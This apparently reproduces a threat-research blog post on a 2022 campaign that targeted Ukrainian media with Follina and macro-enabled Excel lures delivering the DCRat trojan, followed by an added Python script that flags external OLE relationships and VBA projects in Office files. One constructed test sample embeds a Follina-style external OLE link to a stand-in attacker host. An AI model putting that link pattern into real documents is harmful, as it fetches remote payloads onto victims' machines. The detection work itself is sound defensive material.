By Shunichi Imano, James Slaughter, and Fred Gutierrez | June 27, 2022
CERT-UA reported on June 10, 2022 that various media outlets in Ukraine were targeted with emails carrying a malicious document, “СПИСОК_посилань_на_інтерактивні_карти.docx” (“LIST_of_links_interactive_maps.docx” in English). According to the report, the document leverages a then-zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), CVE-2022-30190 (Follina), to download and execute a remote file on the compromised machine. Unfortunately, that payload has not been identified, as the file was no longer available at the time of the investigation.
FortiGuard Labs came across another file that was likely used in the same campaign, based on its identical file name, its timing relative to the CERT-UA report, the date it was submitted to VirusTotal, and the fact that it was submitted from Ukraine. The new file, however, is a macro-enabled Excel workbook (xlsm) carrying malicious VBA macros rather than a docx exploiting CVE-2022-30190 (Follina). Its payload is a DCRat variant, a commercial .NET Remote Access Trojan (RAT) commonly sold on underground forums.
This blog explains how the attack works and the evasive tactics the threat actors used to avoid detection and ultimately install DCRat on an unsuspecting victim’s machine.
Affected Platforms: Windows
Impacted Parties: Windows users
Impact: Exfiltrating data for malicious purposes and keeping persistent backdoor access to the compromised machine
Severity Level: Medium
Unfortunately, the initial attack vector has not been confirmed. Potential victims most likely received emails with a malicious attachment whose Ukrainian file name matches the CERT-UA sample apart from the Excel extension, such as “СПИСОК_посилань на інтерактивні карти.xlsm”.
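The two lure formats described above differ in what sits inside the Office Open XML container: the Follina docx carries an OLE relationship whose target is an external URL, while the Excel lure carries an embedded VBA project (xl/vbaProject.bin). The following triage script, an added example that is not FortiGuard Labs' or CERT-UA's code, opens an Office file as a zip archive and reports either indicator. The sample archives it builds are constructed in memory for the demonstration, and the URL in the docx sample is a placeholder, not an indicator from the campaign.

```python
"""Triage an Office Open XML file for Follina-style external OLE
relationships and embedded VBA projects. Added example, not code from
the original article; sample archives below are constructed inline."""
import io
import re
import zipfile

OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")


def classify_ooxml(data: bytes) -> dict:
    """Walk the zip container and collect the two indicators."""
    result = {"has_vba": False, "external_targets": [], "ole_external": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                # xlsm/docm/pptm store the VBA project as this binary part
                result["has_vba"] = True
            if low.endswith(".rels"):
                xml = zf.read(name).decode("utf-8", errors="replace")
                # <Relationship ...> elements; \b keeps <Relationships> out
                for m in re.finditer(r"<Relationship\b[^>]*>", xml):
                    tag = m.group(0)
                    if 'TargetMode="External"' not in tag:
                        continue  # internal part reference, not interesting
                    target = re.search(r'Target="([^"]*)"', tag)
                    rtype = re.search(r'Type="([^"]*)"', tag)
                    result["external_targets"].append(
                        target.group(1) if target else "")
                    if rtype and rtype.group(1) == OLE_REL:
                        result["ole_external"] = True
    return result


def verdict(indicators: dict) -> str:
    """Summarise the indicators in the order a triage analyst would rank them."""
    if indicators["ole_external"]:
        return "suspicious: external OLE relationship (Follina-style loader)"
    if indicators["has_vba"]:
        return "suspicious: embedded VBA project (macro lure)"
    return "no indicator"


def build_sample(kind: str) -> bytes:
    """Construct a minimal container of the given kind (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        if kind == "xlsm":
            zf.writestr("xl/workbook.xml", "<workbook/>")
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE header
        elif kind == "docx_ext":
            zf.writestr("word/document.xml", "<document/>")
            zf.writestr("word/_rels/document.xml.rels",
                        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
                        '<Relationship Id="rId99" Type="' + OLE_REL + '" '
                        'Target="http://attacker.invalid/lure.html!" TargetMode="External"/>'
                        '</Relationships>')
        else:  # clean docx with only an internal relationship
            zf.writestr("word/document.xml", "<document/>")
            zf.writestr("word/_rels/document.xml.rels",
                        '<Relationships><Relationship Id="rId1" '
                        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
                        'Target="styles.xml"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for kind in ("docx_ext", "xlsm", "clean"):
        print(kind, "->", verdict(classify_ooxml(build_sample(kind))))
```

Run against real attachments with `classify_ooxml(open(path, "rb").read())`; a file that is not a valid zip (for example an RTF or an OLE2 .xls) raises `zipfile.BadZipFile` and needs a different parser.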